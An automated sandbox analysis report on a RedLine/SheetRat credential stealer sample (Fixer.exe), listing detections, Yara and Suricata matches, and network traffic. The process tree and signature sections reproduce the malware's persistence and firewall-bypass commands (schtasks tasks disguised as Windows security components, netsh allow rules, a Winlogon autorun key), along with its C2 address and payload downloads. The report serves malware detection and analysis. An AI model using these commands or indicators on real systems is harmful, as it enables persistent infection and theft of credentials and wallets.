Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Fixer.exe

Overview

General Information

Sample name:Fixer.exe
Analysis ID:1585853
MD5:2acda1f917022e9e8081ad69b15330c6
SHA1:3bad975d496a0066d64470e4ae1002794581c4f8
SHA256:7bc2586b6d70b12f116dc8f538f58665620a765e2c764a5c143b06ec97bacfc0
Infos:

Detection

RedLine, SheetRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected RedLine Stealer
Yara detected SheetRat
.NET source code contains potential unpacker
Allows loading of unsigned dll using appinit_dll
C2 URLs / IPs found in malware configuration
Contains functionality to capture screen (.Net source)
Creates an undocumented autostart registry key
Drops executables to the windows directory (C:\Windows) and starts them
Drops large PE files
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies the windows firewall
Queries memory information (via WMI often done to detect virtual machines)
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Invoke-Obfuscation CLIP+ Launcher
Sigma detected: Invoke-Obfuscation VAR+ Launcher
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion NT Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64native
  • Fixer.exe (PID: 7492 cmdline: "C:\Users\user\Desktop\Fixer.exe" MD5: 2ACDA1F917022E9E8081AD69B15330C6)
    • 6z9uno0baqvej0me.exe (PID: 5376 cmdline: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" MD5: 2E2BF344AC14353A679CCDD682273BE0)
      • cmd.exe (PID: 7376 cmdline: "CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5564 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 7072 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 8080 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 3376 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • cmd.exe (PID: 6596 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 6592 cmdline: schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
    • FixerNerest.exe (PID: 8148 cmdline: "C:\Users\user\AppData\Local\Temp\FixerNerest.exe" MD5: 094EBE271C9334745C238FC2BA77FD38)
      • WmiPrvSE.exe (PID: 824 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • cmd.exe (PID: 5008 cmdline: "CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 5828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
      • cmd.exe (PID: 8152 cmdline: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST & exit MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 6684 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
        • schtasks.exe (PID: 7944 cmdline: schtasks /create /f /sc minute /mo 1 /tn "Microsoft\WindowsAPI" /tr "C:\Windows\System32\Defender.exe" /RL HIGHEST MD5: 796B784E98008854C27F4B18D287BA30)
      • Defender.exe (PID: 2232 cmdline: "C:\Windows\System32\Defender.exe" MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • Defender.exe (PID: 2660 cmdline: C:\Windows\System32\Defender.exe MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • Defender.exe (PID: 3268 cmdline: C:\Windows\System32\Defender.exe MD5: 6C49C48E82A1B13AC0406AD8B049E7DE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Malware Configuration

Threatname: RedLine

{"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Fixer.exeJoeSecurity_RedLineYara detected RedLine StealerJoe Security
    Fixer.exeinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
    • 0x24cc3:$gen01: ChromeGetRoamingName
    • 0x24ce8:$gen02: ChromeGetLocalName
    • 0x24d2b:$gen03: get_UserDomainName
    • 0x28bc4:$gen04: get_encrypted_key
    • 0x27943:$gen05: browserPaths
    • 0x27c19:$gen06: GetBrowsers
    • 0x27501:$gen07: get_InstalledInputLanguages
    • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
    • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
    • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
    • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
    • 0x296c4:$spe9: *wallet*
    • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
    • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
    • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
    • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
    • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
    • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
    • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
    • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

    PCAP (Network Traffic)

    SourceRuleDescriptionAuthorStrings
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SheetRatYara detected SheetRatJoe Security
          00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: Fixer.exe PID: 7492JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                Click to see the 2 entries

                Unpacked PEs

                SourceRuleDescriptionAuthorStrings
                2.2.6z9uno0baqvej0me.exe.12803b30.1.raw.unpackJoeSecurity_SheetRatYara detected SheetRatJoe Security
                  2.2.6z9uno0baqvej0me.exe.12803b30.1.unpackJoeSecurity_SheetRatYara detected SheetRatJoe Security
                    0.0.Fixer.exe.670000.0.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                      0.0.Fixer.exe.670000.0.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                      • 0x24cc3:$gen01: ChromeGetRoamingName
                      • 0x24ce8:$gen02: ChromeGetLocalName
                      • 0x24d2b:$gen03: get_UserDomainName
                      • 0x28bc4:$gen04: get_encrypted_key
                      • 0x27943:$gen05: browserPaths
                      • 0x27c19:$gen06: GetBrowsers
                      • 0x27501:$gen07: get_InstalledInputLanguages
                      • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                      • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                      • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
                      • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
                      • 0x296c4:$spe9: *wallet*
                      • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                      • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                      • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                      • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                      • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                      • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                      • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
                      • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13

                      Sigma Signatures

                      System Summary

                      barindex
                      Sigma detected: Invoke-Obfuscation CLIP+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, ParentProcessId: 5376, ParentProcessName: 6z9uno0baqvej0me.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, ProcessId: 7072, ProcessName: cmd.exe
                      Sigma detected: Invoke-Obfuscation VAR+ Launcher
                      Source: Process startedAuthor: Jonathan Cheong, oscd.community: Data: Command: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, ParentProcessId: 5376, ParentProcessName: 6z9uno0baqvej0me.exe, ProcessCommandLine: "cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit, ProcessId: 7072, ProcessName: cmd.exe
                      Sigma detected: CurrentVersion NT Autorun Keys Modification
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Windows\System32\userinit.exe,C:\Windows\System32\xdwdSecurityHealthSystrays.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe, ProcessId: 5376, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit

                      Suricata Signatures

                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T11:24:21.630664+010020432341A Network Trojan was detected89.23.97.1211112192.168.11.2049748TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T11:24:21.358270+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:26.669865+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:27.070524+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:27.708030+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:28.033899+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:28.848988+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:29.121943+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:29.393622+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:29.695937+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:29.970275+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:30.244400+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:30.586256+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:30.939569+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:31.213342+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:31.488362+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:31.806733+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:33.019673+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:33.293505+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:33.566799+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:33.845047+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:34.117796+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:34.472435+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:34.743199+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:37.512019+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:37.783860+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:41.963009+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      2025-01-08T11:24:42.273238+010020432311A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T11:24:21.358270+010020460451A Network Trojan was detected192.168.11.204974889.23.97.1211112TCP
                      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                      2025-01-08T11:24:40.760334+010028033053Unknown Traffic192.168.11.204974989.23.97.1211911TCP

                      Joe Sandbox Signatures

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Antivirus detection for dropped file
                      Source: C:\Windows\System32\Defender.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeAvira: detection malicious, Label: HEUR/AGEN.1310090
                      Source: C:\Windows\System32\xdwdSecurityHealthSystrays.exeAvira: detection malicious, Label: TR/Crypt.OPACK.Gen
                      Found malware configuration
                      Source: Fixer.exeMalware Configuration Extractor: RedLine {"C2 url": ["89.23.97.121:1112"], "Bot Id": "Umbrella", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
                      Multi AV Scanner detection for submitted file
                      Source: Fixer.exeReversingLabs: Detection: 68%
                      Source: Fixer.exeVirustotal: Detection: 79%Perma Link
                      Machine Learning detection for dropped file
                      Source: C:\Users\user\AppData\Local\Temp\FixerNerest.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeJoe Sandbox ML: detected
                      Machine Learning detection for sample
                      Source: Fixer.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623B670 CryptUnprotectData,0_2_0623B670
                      Source: C:\Users\user\Desktop\Fixer.exeCode function: 0_2_0623BC71 CryptUnprotectData,0_2_0623BC71
                      Source: Fixer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: Fixer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\Malware\Desktop\hack tool\Backdoor\SheetRat\SheetRat\bin\Release\Stub\UserMode.pdb source: 6z9uno0baqvej0me.exe, 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\userJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.iniJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet ExplorerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppDataJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior

                      Networking

                      barindex
                      Suricata IDS alerts for network traffic
                      Source: Network trafficSuricata IDS: 2043231 - Severity 1 - ET MALWARE Redline Stealer TCP CnC Activity : 192.168.11.20:49748 -> 89.23.97.121:1112
                      Source: Network trafficSuricata IDS: 2046045 - Severity 1 - ET MALWARE [ANY.RUN] RedLine Stealer/MetaStealer Family Related (MC-NMF Authorization) : 192.168.11.20:49748 -> 89.23.97.121:1112
                      Source: Network trafficSuricata IDS: 2043234 - Severity 1 - ET MALWARE Redline Stealer TCP CnC - Id1Response : 89.23.97.121:1112 -> 192.168.11.20:49748
                      C2 URLs / IPs found in malware configuration
                      Source: Malware configuration extractorURLs: 89.23.97.121:1112
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49749
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 1911
                      Source: unknownNetwork traffic detected: HTTP traffic on port 1911 -> 49749
                      Source: global trafficTCP traffic: 192.168.11.20:49748 -> 89.23.97.121:1112
                      Source: global trafficTCP traffic: 192.168.11.20:49750 -> 147.185.221.24:61069
                      Source: global trafficHTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1Host: 89.23.97.121:1911Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /FixerNerest.exe HTTP/1.1Host: 89.23.97.121:1911
                      Source: Joe Sandbox ViewIP Address: 147.185.221.24 147.185.221.24
                      Source: Joe Sandbox ViewASN Name: MAXITEL-ASRU MAXITEL-ASRU
                      Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49749 -> 89.23.97.121:1911
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: unknownTCP traffic detected without corresponding DNS query: 89.23.97.121
                      Source: global trafficHTTP traffic detected: GET /6z9uno0baqvej0me.exe HTTP/1.1Host: 89.23.97.121:1911Connection: Keep-Alive
                      Source: global trafficHTTP traffic detected: GET /FixerNerest.exe HTTP/1.1Host: 89.23.97.121:1911
                      Source: Fixer.exe, 00000000.00000002.52600457326.00000000031AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ","type":"MediaFoundationOptIn"},{"name":"OptOut","type":"MediaFoundationOptOut"}],"version":1},"web_notification_override":{"applications":[{"applied_policy":"prompt","domain":"www.reddit.com"},{"applied_policy":"prompt","domain":"www.telegraphindia.com"},{"applied_policy":"prompt","domain":"timesofindia.indiatimes.com"},{"applied_policy":"prompt","domain":"pushengage.com"},{"applied_policy":"prompt","domain":"www.timesnownews.com"},{"applied_policy":"prompt","domain":"www.couponrani.com"},{"applied_policy":"prompt","domain":"www.wholesomeyum.com"},{"applied_policy":"prompt","domain":"www.asklaila.com"},{"applied_policy":"prompt","domain":"www.sammobile.com"},{"applied_policy":"prompt","domain":"www.ecuavisa.com"},{"applied_policy":"prompt","domain":"uz.sputniknews.ru"},{"applied_policy":"prompt","domain":"www.ndtv.com"},{"applied_policy":"prompt","domain":"www.elimparcial.com"},{"applied_policy":"prompt","domain":"www.povarenok.ru"},{"applied_policy":"prompt","domain":"www.estadao.com.br"},{"applied_policy":"prompt","domain":"olxpakistan.os.tc"},{"applied_policy":"prompt","domain":"televisa.com"},{"applied_policy":"prompt","domain":"uol.com.br"},{"applied_policy":"prompt","domain":"www.axisbank.com"},{"applied_policy":"prompt","domain":"mutualfund.adityabirlacapital.com"},{"applied_policy":"prompt","domain":"www.facebook.com"},{"applied_policy":"prompt","domain":"www.instagram.com"},{"applied_policy":"prompt","domain":"www.messenger.com"}],"policies":[{"name":"prompt","reason":"","type":"","value":""}],"version":1}},"fre":{"autoimport_spartan_visible_item_completed":true,"oem_bookmarks_set":true,"should_user_see_fre_banner":"C:\\Users\\user\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"},"hardware_acceleration_mode_previous":true,"is_dsp_recommended":true,"legacy":{"profile":{"name":{"migrated":true}}},"migration":{"Default":{"migration_attempt":0,"migration_version":4},"last_edgeuwp_pin_migration_on_edge_version":"94.0.992.31","last_edgeuwp_pin_migration_on_os_version":"10 Version 20H2 (Build 